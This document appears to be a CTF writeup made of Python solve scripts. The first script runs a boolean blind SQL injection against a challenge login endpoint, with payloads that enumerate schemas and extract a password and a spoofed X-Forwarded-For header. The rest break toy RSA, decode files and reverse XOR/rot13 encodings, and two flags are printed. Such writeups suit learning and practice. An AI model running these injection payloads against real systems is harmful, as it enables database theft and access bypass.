import requests
import base64
import time
import string


def main():
    """Recover a string one character at a time through a boolean login oracle.

    Writeup script for the CTF instance whose URL is hard-coded below.  Each
    request wraps a username in ``user:<name>|pass:admin``, base64-encodes it
    and sends it as the ``data`` query parameter of ``check.php``.  The only
    signal read back is whether the response body contains "登陆成功"
    ("login successful").

    Review notes for whoever owns an endpoint like this one:
      * The oracle exists only if the decoded username reaches the SQL text
        unescaped -- presumably by string concatenation; the server code is
        not shown.  Bound parameters (prepared statements) remove it.
      * Base64-wrapping the parameter is an encoding, not a control: it hides
        the value from naive pattern matching but the server decodes it before
        use, so inspection has to happen after decoding.
      * The request sets ``X-Forwarded-For: 127.0.0.1``, presumably because
        the challenge gates access on that header.  The header is chosen by
        the client and must not be used as an access check.
      * The traffic pattern is distinctive: a long run of near-identical
        requests to one endpoint differing in a single character.
    """
    table = string.printable.strip()
    res = ""
    position = 1
    while True:
        matched = False
        for candidate in table:
            # Earlier stages of the same probe, kept from the writeup together
            # with the values each one returned:
            # payload = f"admin' and if(substr((select group_concat(schema_name) from information_schema.schemata),{position},1)='{candidate}',1,0); #"
            # information_schema,mysql,performance_schema,ctftraining,test,sql
            # payload = f"admin' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{position},1)='{candidate}',1,0); #"
            # flag_table,news,users
            # limit 1,1
            # payload = f"admin' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctftraining' and table_name='users'),{position},1)='{candidate}',1,0); #"
            payload = f"admin' and if(substr((select group_concat(password) from sql.user where username='flag'),{position},1)='{candidate}',1,0); #"
            print(payload)

            wrapped = "user:{}|pass:admin".format(payload)
            content = base64.b64encode(wrapped.encode()).decode()
            url = f"http://89f188af-9856-452f-9aed-f4ea82f83339.recruit.qsnctf.com:8080/check.php?data={content}"
            headers = {"X-Forwarded-For": "127.0.0.1"}

            # A fresh session per request, redirects not followed: the body of
            # the first response is the only thing inspected.
            session = requests.Session()
            response = session.get(url, headers=headers, allow_redirects=False)

            if "登陆成功" in response.text:
                position += 1
                res += candidate
                matched = True
                break
            # Progress is echoed after every non-matching candidate.
            print(res)

        # A full pass over the alphabet without a match ends the run.
        if not matched:
            break


main()
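import binascii

# Rebuild result.zip from the hex dump stored in content.txt.
with open('content.txt', 'r') as f:
    # str.split() with no argument drops every kind of whitespace (spaces,
    # newlines, tabs, carriage returns), so a dump saved with CRLF line
    # endings decodes as well as the space/newline layout handled originally.
    content = ''.join(f.read().split())

# Decode before opening the output so a malformed dump (odd length, non-hex
# character -> binascii.Error) does not leave an empty result.zip behind.
archive_bytes = binascii.unhexlify(content)

# The context manager closes the handle, so the archive is fully flushed
# before anything else tries to open it.
with open('result.zip', 'wb') as out:
    out.write(archive_bytes)

# NOTE(review): the archive comes from challenge data; list its members before
# extracting rather than unpacking it blindly into a working directory.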
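import binascii
import base64

# Base64 text of a PNG image recovered earlier in the challenge, kept exactly
# as it appears in the writeup (including the embedded spaces and line breaks).
content3 = """ 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 +Vp/p01UAAAAASUVORK5CYII= """.split('\n')

# Glue the physical lines back into one string.  The embedded spaces are left
# in place: base64.b64decode() without validate=True discards characters
# outside the base64 alphabet, so they do not affect the decoded bytes.
content = "".join(content3)
print(content)

# Decode first, then write through a context manager so the file handle is
# closed (and the image fully flushed) as soon as the write finishes.
image_bytes = base64.b64decode(content)
with open('flag.png', 'wb') as out:
    out.write(image_bytes)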
运行得到flag的另一半,最后拼接得到最终flag
qsnctf{b5512946-d7ac-45c9-afd0-a3f28ba547ea}
Crypto
82.83.65
import gmpy2
import libnum
from Crypto.Util.number import *
from binascii import a2b_hex, b2a_hex

# Challenge generator: textbook RSA over a hard-coded key.
#
# Review notes:
#   * p and q are 39-digit (under 128-bit) primes, so n is a roughly 256-bit
#     modulus -- far below any size considered safe -- and both factors are
#     written out in this file anyway.
#   * The message is encrypted with a bare pow(m, e, n); no padding scheme is
#     applied.
# Both are deliberate for an exercise and are not a pattern to reuse.

flag = b"*********************"  # redacted placeholder for the real flag

p = 262248800182277040650192055439906580479
q = 262854994239322828547925595487519915551
e = 65533

n = p * q
phi = (p - 1) * (q - 1)

# Private exponent: modular inverse of e modulo phi(n).
d = gmpy2.invert(e, phi)
# print(d)

# Hex-encode the flag bytes and read them back as one big integer.
m = int(b2a_hex(flag), 16)
c = pow(m, e, n)
print(c)
# C = 31021919570683223794356421266753186826747161146739784961769368259629146487802
from base64 import b64encode as b32encode
from gmpy2 import invert, gcd, iroot
from Crypto.Util.number import *
from binascii import a2b_hex, b2a_hex
import random

# Challenge generator (Python 2 syntax: print statements, str used as bytes).
#
# Review notes on why the resulting ciphertext is recoverable:
#   * p is printed next to n, so q = n / p and phi follow immediately.
#   * e is drawn with the non-cryptographic `random` module from a window of
#     about 30,000 values, so keeping it secret adds no meaningful work.
#   * The loop below steps e downwards until it is coprime with phi, so the
#     final e can end up slightly below 20000.
#   * `b32encode` is only an alias: the function actually called is
#     base64.b64encode.

flag = "*************"  # redacted placeholder for the real flag
nbit = 128

p = getPrime(nbit)
q = getPrime(nbit)
n = p * q
print p
print n

phi = (p - 1) * (q - 1)

# Start from a random exponent and walk down to the first value that is
# invertible modulo phi.
e = random.randint(20000, 50000)
while gcd(e, phi) != 1:
    e -= 1

c = pow(int(b2a_hex(flag), 16), e, n)

# The ciphertext is published twice: base64 of its decimal string, reversed,
# and the decimal string itself.
print b32encode(str(c))[::-1]
print str(c)
# 20392798836838831460465406987101354448592610558736461081264936079945558905138
p = 185392927331398754034773152474166007097 n = 33047182186833739970146873552408478599841138065558351794468963853252513446871 c = =gzMxUDM5gTN1UDN5kzNwYzM5QjNyEDOwEjN0YzM3gTN1ATM2ITO1gDN0QTNzEDMxcDO5YDM0UjN0AjN0EzM4gzM4YzM4gTO3ITOzAjM
n,p,c已知 e范围20000-50000 爆破下即可。
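import base64
from gmpy2 import invert, gcd
from Crypto.Util.number import *

# Solver for the challenge above.  It works because the generator published
# one prime factor (p) together with n: q, phi and therefore every candidate
# private exponent can be computed directly, leaving only e unknown.

n = 33047182186833739970146873552408478599841138065558351794468963853252513446871
p = 185392927331398754034773152474166007097

# Guard against a mistyped constant: everything below assumes p divides n.
if n % p != 0:
    raise ValueError("p is not a factor of n")
q = n // p

# The published ciphertext is base64(decimal string of c), reversed.
c = '=gzMxUDM5gTN1UDN5kzNwYzM5QjNyEDOwEjN0YzM3gTN1ATM2ITO1gDN0QTNzEDMxcDO5YDM0UjN0AjN0EzM4gzM4YzM4gTO3ITOzAjM'
c = int(base64.b64decode(c[::-1]).decode())

phi = (p - 1) * (q - 1)

# The generator picks e = randint(20000, 50000) and then decrements it until
# gcd(e, phi) == 1, so the real exponent is never above 50000 but may fall
# below 20000.  Scanning range(20000, 50000) would miss that case; cover the
# whole interval the generator can reach instead.
for e in range(2, 50001):
    if gcd(e, phi) != 1:
        continue  # not invertible modulo phi, cannot be the exponent used
    d = invert(e, phi)
    m = pow(c, d, n)
    plaintext = long_to_bytes(m)
    # The known flag prefix identifies the one exponent that decrypts cleanly.
    if b'qsnctf' in plaintext:
        print(plaintext)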
运行得到flag
qsnctf{!RSA_SO_EASY$$}
Reverse
Check
64位程序,主要程序:
异或解密下就行。
# The 23 encoded characters taken from the binary, followed by 100 empty
# slots that serve as the output buffer.
ls = list('qrl`pc}J8q;eSAayuNk|a4k') + [""] * 100

# Each encoded character is XORed with its own index; the results are stored
# in slots 24..46, mirroring the layout used in the original listing.
ls[24:47] = [chr(pos ^ ord(ch)) for pos, ch in enumerate(ls[:23])]

# Slot 23 is still an empty string, so joining from there prints only the
# decoded text.
print(''.join(ls[23:]))
import base64
import string


def rot13(n):
    """Rotate letters by 13 places and digits by 5; leave other characters alone.

    Both rotations are half of their alphabet, so applying the function twice
    returns the original text.
    """
    mapping = {}
    for alphabet, shift in (
        (string.digits, 5),
        (string.ascii_lowercase, 13),
        (string.ascii_uppercase, 13),
    ):
        mapping.update(zip(alphabet, alphabet[shift:] + alphabet[:shift]))
    return "".join(mapping.get(ch, ch) for ch in n)


# The stored string is reversed text whose letters and digits were rotated.
cipher = "=DzMuO8MmgaomuGA9Rmpj5lAkAwZgxQplNGYhOwAi6lAmywZlqGZ7LQB7pGs"[::-1]
unrotated = rot13(cipher)
print(cipher, unrotated)

# Undo the layers in order: rotation -> base64 -> rotation -> reversal.
decoded = base64.b64decode(unrotated).decode()
print(rot13(decoded)[::-1])